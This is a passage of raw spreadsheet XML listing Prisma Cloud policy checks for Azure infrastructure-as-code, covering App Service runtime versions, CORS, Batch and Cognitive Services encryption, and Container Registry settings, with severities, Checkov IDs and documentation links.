      <c r="M869" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N869" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O869" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P869" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q869" t="inlineStr"/>
      <c r="R869" t="inlineStr"/>
      <c r="S869" t="inlineStr"/>
      <c r="T869" t="b">
        <v>0</v>
      </c>
      <c r="U869" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V869" t="inlineStr">
        <is>
          <t>IaC:General:azure-app-service</t>
        </is>
      </c>
      <c r="W869" t="inlineStr">
        <is>
          <t>Ensure that 'Python version' is the latest, if used to run the web app</t>
        </is>
      </c>
      <c r="X869" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-python-version-is-the-latest-if-used-to-run-the-web-app</t>
        </is>
      </c>
      <c r="Y869" t="inlineStr"/>
      <c r="Z869" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA869" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB869" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC869" t="inlineStr">
        <is>
          <t>CKV_AZURE_82</t>
        </is>
      </c>
      <c r="AD869" t="b">
        <v>1</v>
      </c>
      <c r="AE869" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF869" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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69" t="inlineStr">
        <is>
          <t>df25ef8c-da56-49f6-b2af-c90d9da01b45</t>
        </is>
      </c>
      <c r="AI869" t="inlineStr"/>
      <c r="AJ869" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK869" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" t="inlineStr"/>
      <c r="B870" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C870" s="2" t="inlineStr"/>
      <c r="D870" t="inlineStr"/>
      <c r="E870" t="inlineStr"/>
      <c r="F870" t="inlineStr"/>
      <c r="G870" t="b">
        <v>1</v>
      </c>
      <c r="H8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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J870" t="inlineStr">
        <is>
          <t>IaC:General:azure-app</t>
        </is>
      </c>
      <c r="K870" t="inlineStr">
        <is>
          <t>Azure App Service Web app doesn't use latest .Net framework version</t>
        </is>
      </c>
      <c r="L870" t="inlineStr"/>
      <c r="M870" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N870" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O870" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P870" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q870" t="inlineStr"/>
      <c r="R870" t="inlineStr"/>
      <c r="S870" t="inlineStr"/>
      <c r="T870" t="b">
        <v>0</v>
      </c>
      <c r="U870" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V870" t="inlineStr">
        <is>
          <t>IaC:General:azure-app-service</t>
        </is>
      </c>
      <c r="W870" t="inlineStr">
        <is>
          <t>Ensure that 'Net Framework' version is the latest, if used as a part of the web app</t>
        </is>
      </c>
      <c r="X870" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-net-framework-version-is-the-latest-if-used-as-a-part-of-the-web-app</t>
        </is>
      </c>
      <c r="Y870" t="inlineStr"/>
      <c r="Z870" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA870" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB870" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC870" t="inlineStr">
        <is>
          <t>CKV_AZURE_80</t>
        </is>
      </c>
      <c r="AD870" t="b">
        <v>1</v>
      </c>
      <c r="AE870" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF870" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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0" t="inlineStr">
        <is>
          <t>881b44d4-4284-4ac4-896a-d8e45d38a584</t>
        </is>
      </c>
      <c r="AI870" t="inlineStr"/>
      <c r="AJ870" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK870" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" t="inlineStr"/>
      <c r="B871" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C871" s="2" t="inlineStr"/>
      <c r="D871" t="inlineStr"/>
      <c r="E871" t="inlineStr"/>
      <c r="F871" t="inlineStr"/>
      <c r="G871" t="b">
        <v>1</v>
      </c>
      <c r="H8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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J871" t="inlineStr">
        <is>
          <t>IaC:General:azure-app</t>
        </is>
      </c>
      <c r="K871" t="inlineStr">
        <is>
          <t>Azure App Service Web app does not use latest PHP version</t>
        </is>
      </c>
      <c r="L871" t="inlineStr"/>
      <c r="M871" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N871" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O871" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P871" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q871" t="inlineStr"/>
      <c r="R871" t="inlineStr"/>
      <c r="S871" t="inlineStr"/>
      <c r="T871" t="b">
        <v>0</v>
      </c>
      <c r="U871" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V871" t="inlineStr">
        <is>
          <t>IaC:General:azure-app-service</t>
        </is>
      </c>
      <c r="W871" t="inlineStr">
        <is>
          <t>Ensure that 'PHP version' is the latest, if used to run the web app</t>
        </is>
      </c>
      <c r="X871" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-php-version-is-the-latest-if-used-to-run-the-web-app</t>
        </is>
      </c>
      <c r="Y871" t="inlineStr"/>
      <c r="Z871" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA871" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB871" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC871" t="inlineStr">
        <is>
          <t>CKV_AZURE_81</t>
        </is>
      </c>
      <c r="AD871" t="b">
        <v>1</v>
      </c>
      <c r="AE871" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF871" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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1" t="inlineStr">
        <is>
          <t>4402aa89-9823-4858-ae66-e4dfbab33bcc</t>
        </is>
      </c>
      <c r="AI871" t="inlineStr"/>
      <c r="AJ871" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK871" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" t="inlineStr"/>
      <c r="B872" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C872" s="2" t="inlineStr"/>
      <c r="D872" t="inlineStr"/>
      <c r="E872" t="inlineStr"/>
      <c r="F872" t="inlineStr"/>
      <c r="G872" t="b">
        <v>1</v>
      </c>
      <c r="H8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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J872" t="inlineStr">
        <is>
          <t>IaC:General:azure-app</t>
        </is>
      </c>
      <c r="K872" t="inlineStr">
        <is>
          <t>CORS allows resource to access app services</t>
        </is>
      </c>
      <c r="L872" t="inlineStr"/>
      <c r="M872" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N872" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O872" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P872" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q872" t="inlineStr"/>
      <c r="R872" t="inlineStr"/>
      <c r="S872" t="inlineStr"/>
      <c r="T872" t="b">
        <v>0</v>
      </c>
      <c r="U872" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V872" t="inlineStr">
        <is>
          <t>IaC:General:azure-app-service</t>
        </is>
      </c>
      <c r="W872" t="inlineStr">
        <is>
          <t>Ensure that CORS disallows every resource to access app services</t>
        </is>
      </c>
      <c r="X872" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-app-services</t>
        </is>
      </c>
      <c r="Y872" t="inlineStr"/>
      <c r="Z872" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA872" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB872" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC872" t="inlineStr">
        <is>
          <t>CKV_AZURE_57</t>
        </is>
      </c>
      <c r="AD872" t="b">
        <v>1</v>
      </c>
      <c r="AE872" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF872" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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2" t="inlineStr">
        <is>
          <t>50ef4f8f-614c-43dc-84bb-f22dbbbd1a8a</t>
        </is>
      </c>
      <c r="AI872" t="inlineStr"/>
      <c r="AJ872" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK872" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" t="inlineStr"/>
      <c r="B873" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C873" s="2" t="inlineStr"/>
      <c r="D873" t="inlineStr"/>
      <c r="E873" t="inlineStr"/>
      <c r="F873" t="inlineStr"/>
      <c r="G873" t="b">
        <v>1</v>
      </c>
      <c r="H8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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J873" t="inlineStr">
        <is>
          <t>IaC:General:azure-app</t>
        </is>
      </c>
      <c r="K873" t="inlineStr">
        <is>
          <t>Azure App Service Web app does not use latest Java version</t>
        </is>
      </c>
      <c r="L873" t="inlineStr"/>
      <c r="M873" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N873" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O873" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P873" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q873" t="inlineStr"/>
      <c r="R873" t="inlineStr"/>
      <c r="S873" t="inlineStr"/>
      <c r="T873" t="b">
        <v>0</v>
      </c>
      <c r="U873" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V873" t="inlineStr">
        <is>
          <t>IaC:General:azure-app-service</t>
        </is>
      </c>
      <c r="W873" t="inlineStr">
        <is>
          <t>Ensure that 'Java version' is the latest, if used to run the web app</t>
        </is>
      </c>
      <c r="X873" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-java-version-is-the-latest-if-used-to-run-the-web-app</t>
        </is>
      </c>
      <c r="Y873" t="inlineStr"/>
      <c r="Z873" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA873" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB873" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC873" t="inlineStr">
        <is>
          <t>CKV_AZURE_83</t>
        </is>
      </c>
      <c r="AD873" t="b">
        <v>1</v>
      </c>
      <c r="AE873" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF873" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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3" t="inlineStr">
        <is>
          <t>5aebd2ef-e2d2-4b3a-8d35-70e1d2b4de79</t>
        </is>
      </c>
      <c r="AI873" t="inlineStr"/>
      <c r="AJ873" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK873" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" t="inlineStr"/>
      <c r="B874" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C874" s="2" t="inlineStr"/>
      <c r="D874" t="inlineStr"/>
      <c r="E874" t="inlineStr"/>
      <c r="F874" t="inlineStr"/>
      <c r="G874" t="b">
        <v>1</v>
      </c>
      <c r="H8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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J874" t="inlineStr">
        <is>
          <t>IaC:General:azure-batch</t>
        </is>
      </c>
      <c r="K874" t="inlineStr">
        <is>
          <t>Azure Batch account does not use key vault to encrypt data</t>
        </is>
      </c>
      <c r="L874" t="inlineStr"/>
      <c r="M874" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N874" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O874" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P874" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q874" t="inlineStr"/>
      <c r="R874" t="inlineStr"/>
      <c r="S874" t="inlineStr"/>
      <c r="T874" t="b">
        <v>0</v>
      </c>
      <c r="U874" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V874" t="inlineStr">
        <is>
          <t>IaC:General:azure-batch-account</t>
        </is>
      </c>
      <c r="W874" t="inlineStr">
        <is>
          <t>Ensure that Azure Batch account uses key vault to encrypt data</t>
        </is>
      </c>
      <c r="X874" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-batch-account-uses-key-vault-to-encrypt-data</t>
        </is>
      </c>
      <c r="Y874" t="inlineStr"/>
      <c r="Z874" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_batch_account"]}</t>
        </is>
      </c>
      <c r="AA874" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB874" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC874" t="inlineStr">
        <is>
          <t>CKV_AZURE_76</t>
        </is>
      </c>
      <c r="AD874" t="b">
        <v>1</v>
      </c>
      <c r="AE874" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF874" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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4" t="inlineStr">
        <is>
          <t>7a43a61b-ebce-4d88-a9d5-90d6affb1431</t>
        </is>
      </c>
      <c r="AI874" t="inlineStr"/>
      <c r="AJ874" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK874" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" t="inlineStr"/>
      <c r="B875" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C875" s="2" t="inlineStr"/>
      <c r="D875" t="inlineStr"/>
      <c r="E875" t="inlineStr"/>
      <c r="F875" t="inlineStr"/>
      <c r="G875" t="b">
        <v>1</v>
      </c>
      <c r="H8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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J875" t="inlineStr">
        <is>
          <t>IaC:General:azure-cognitive</t>
        </is>
      </c>
      <c r="K875" t="inlineStr">
        <is>
          <t>Azure Cognitive Services does not Customer Managed Keys (CMKs) for encryption</t>
        </is>
      </c>
      <c r="L875" t="inlineStr"/>
      <c r="M875" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N875" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O875" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P875" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q875" t="inlineStr"/>
      <c r="R875" t="inlineStr"/>
      <c r="S875" t="inlineStr"/>
      <c r="T875" t="b">
        <v>0</v>
      </c>
      <c r="U875" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V875" t="inlineStr">
        <is>
          <t>IaC:General:azure-cognitive-account,azure-cognitive-account-customer-managed-key</t>
        </is>
      </c>
      <c r="W875" t="inlineStr">
        <is>
          <t>Ensure that Cognitive Services enables customer-managed key for encryption</t>
        </is>
      </c>
      <c r="X875" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-azure-cognitive-services-enables-customer-managed-keys-cmks-for-encryption</t>
        </is>
      </c>
      <c r="Y875" t="inlineStr"/>
      <c r="Z875" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_cognitive_account", "azurerm_cognitive_account_customer_managed_key"]}</t>
        </is>
      </c>
      <c r="AA875" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB875" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC875" t="inlineStr">
        <is>
          <t>CKV2_AZURE_22</t>
        </is>
      </c>
      <c r="AD875" t="b">
        <v>1</v>
      </c>
      <c r="AE875" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF875" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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5" t="inlineStr">
        <is>
          <t>2f8c5bf7-682c-4efd-afbd-9a5fd6b5f1d9</t>
        </is>
      </c>
      <c r="AI875" t="inlineStr"/>
      <c r="AJ875" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK875" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" t="inlineStr"/>
      <c r="B876" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C876" s="2" t="inlineStr"/>
      <c r="D876" t="inlineStr"/>
      <c r="E876" t="inlineStr"/>
      <c r="F876" t="inlineStr"/>
      <c r="G876" t="b">
        <v>1</v>
      </c>
      <c r="H8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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J876" t="inlineStr">
        <is>
          <t>IaC:General:azure-container</t>
        </is>
      </c>
      <c r="K876" t="inlineStr">
        <is>
          <t>Azure Container Registry (ACR) Isn't Configured to Use Signed/Trusted Images</t>
        </is>
      </c>
      <c r="L876" t="inlineStr"/>
      <c r="M876" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N876" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O876" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P876" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q876" t="inlineStr"/>
      <c r="R876" t="inlineStr"/>
      <c r="S876" t="inlineStr"/>
      <c r="T876" t="b">
        <v>0</v>
      </c>
      <c r="U876" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V876" t="inlineStr">
        <is>
          <t>IaC:General:azure-container-registry</t>
        </is>
      </c>
      <c r="W876" t="inlineStr">
        <is>
          <t>Ensures that ACR uses signed/trusted images</t>
        </is>
      </c>
      <c r="X876" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-164</t>
        </is>
      </c>
      <c r="Y876" t="inlineStr"/>
      <c r="Z876" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_container_registry"]}</t>
        </is>
      </c>
      <c r="AA876" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB876" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC876" t="inlineStr">
        <is>
          <t>CKV_AZURE_164</t>
        </is>
      </c>
      <c r="AD876" t="b">
        <v>1</v>
      </c>
      <c r="AE876" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF876" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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6" t="inlineStr">
        <is>
          <t>10ba14d8-1b1b-41c7-b1d1-83ee03660354</t>
        </is>
      </c>
      <c r="AI876" t="inlineStr"/>
      <c r="AJ876" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK876" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" t="inlineStr"/>
      <c r="B877" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C877" s="2" t="inlineStr"/>
      <c r="D877" t="inlineStr"/>
      <c r="E877" t="inlineStr"/>
      <c r="F877" t="inlineStr"/>
      <c r="G877" t="b">
        <v>1</v>
      </c>
      <c r="H8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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J877" t="inlineStr">
        <is>
          <t>IaC:General:azure-container</t>
        </is>
      </c>
      <c r="K877" t="inlineStr">
        <is>
          <t>Vulnerability Scanning not enabled for Azure Container Registry</t>
        </is>
      </c>
      <c r="L877" t="inlineStr"/>
      <c r="M877" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N877" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O877" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P877" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q877" t="inlineStr"/>
      <c r="R877" t="inlineStr"/>
      <c r="S877" t="inlineStr"/>
      <c r="T877" t="b">
        <v>0</v>
      </c>
      <c r="U877" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V877" t="inlineStr">
        <is>
          <t>IaC:General:azure-container-registry</t>
        </is>
      </c>
      <c r="W877" t="inlineStr">
        <is>
          <t>Enable vulnerability scanning for container images.</t>
        </is>
      </c>
      <c r="X877" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-163</t>
        </is>
      </c>
      <c r="Y877" t="inlineStr"/>
      <c r="Z877" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_container_registry"]}</t>
        </is>
      </c>
      <c r="AA877" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB877" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC877" t="inlineStr">
        <is>
          <t>CKV_AZURE_163</t>
        </is>
      </c>
      <c r="AD877" t="b">
        <v>1</v>
      </c>
      <c r="AE877" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF877" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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7" t="inlineStr">
        <is>
          <t>6d9f45e7-531c-4987-a837-7b40cb96646f</t>
        </is>
      </c>
      <c r="AI877" t="inlineStr"/>
      <c r="AJ877" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK877" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" t="inlineStr"/>
      <c r="B878" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C878" s="2" t="inlineStr"/>
      <c r="D878" t="inlineStr"/>
      <c r="E878" t="inlineStr"/>
      <c r="F878" t="inlineStr"/>
      <c r="G878" t="b">
        <v>1</v>
      </c>
      <c r="H8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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J878" t="inlineStr">
        <is>
          <t>IaC:General:azure-container</t>
        </is>
      </c>
      <c r="K878" t="inlineStr">
        <is>
          <t>Azure Container Registry (ACR) Doesn't Have a Retention Policy Set</t>
        </is>
      </c>
      <c r="L878" t="inlineStr"/>
      <c r="M878" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N878" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O878" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P878" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q878" t="inlineStr"/>
      <c r="R878" t="inlineStr"/>
      <c r="S878" t="inlineStr"/>
      <c r="T878" t="b">
        <v>0</v>
      </c>
      <c r="U878" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V878" t="inlineStr">
        <is>
          <t>IaC:General:azure-container-registry</t>
        </is>
      </c>
      <c r="W878" t="inlineStr">
        <is>
          <t>Ensure a retention policy is set to cleanup untagged manifests.</t>
        </is>
      </c>
      <c r="X878" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-167</t>
        </is>
      </c>
      <c r="Y878" t="inlineStr"/>
      <c r="Z878" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_container_registry"]}</t>
        </is>
      </c>
      <c r="AA878" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB878" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC878" t="inlineStr">
        <is>
          <t>CKV_AZURE_167</t>
        </is>
      </c>
      <c r="AD878" t="b">
        <v>1</v>
      </c>
      <c r="AE878" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF878" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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8" t="inlineStr">
        <is>
          <t>d242ebda-2743-4f06-bcfa-86e60a472be4</t>
        </is>
      </c>
      <c r="AI878" t="inlineStr"/>
      <c r="AJ878" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK878" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" t="inlineStr"/>
      <c r="B879" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C879" s="2" t="inlineStr"/>
      <c r="D879" t="inlineStr"/>
      <c r="E879" t="inlineStr"/>
      <c r="F879" t="inlineStr"/>
      <c r="G879" t="b">
        <v>1</v>
      </c>
      <c r="H8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79" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J879" t="inlineStr">
        <is>
          <t>IaC:General:azure-container</t>
        </is>
      </c>
      <c r="K879" t="inlineStr">
        <is>
          <t>Azure Container Registry (ACR) Does Not Have a Quarantine Policy Enabled</t>
        </is>
      </c>
      <c r="L879" t="inlineStr"/>
      <c r="M879" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N879" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O879" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P879" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q879" t="inlineStr"/>
      <c r="R879" t="inlineStr"/>
      <c r="S879" t="inlineStr"/>
      <c r="T879" t="b">
        <v>0</v>
      </c>
      <c r="U879" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V879" t="inlineStr">
        <is>
          <t>IaC:General:azure-container-registry</t>
        </is>
      </c>
      <c r="W879" t="inlineStr">
        <is>
          <t>Ensure container image quarantine, scan, and mark images verified</t>
        </is>
      </c>
      <c r="X879" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
